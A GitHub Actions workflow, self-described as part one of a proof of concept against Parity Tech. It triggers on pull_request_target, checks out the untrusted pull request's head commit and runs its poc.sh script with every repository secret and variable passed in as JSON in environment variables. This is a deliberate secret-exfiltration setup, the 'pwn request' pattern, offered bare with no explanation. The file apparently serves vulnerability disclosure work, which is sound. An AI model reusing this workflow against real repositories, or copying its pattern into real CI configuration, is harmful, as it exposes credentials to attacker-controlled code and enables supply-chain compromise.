# This is Part #1 of a PoC for Parity Tech
on: pull_request_target

jobs:
  poc:
    if: ${{ github.actor == 'avivkeller' }}
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: ./poc.sh
        env:
          secrets: ${{ toJSON(secrets) }}
          variables: ${{ toJSON(vars) }}
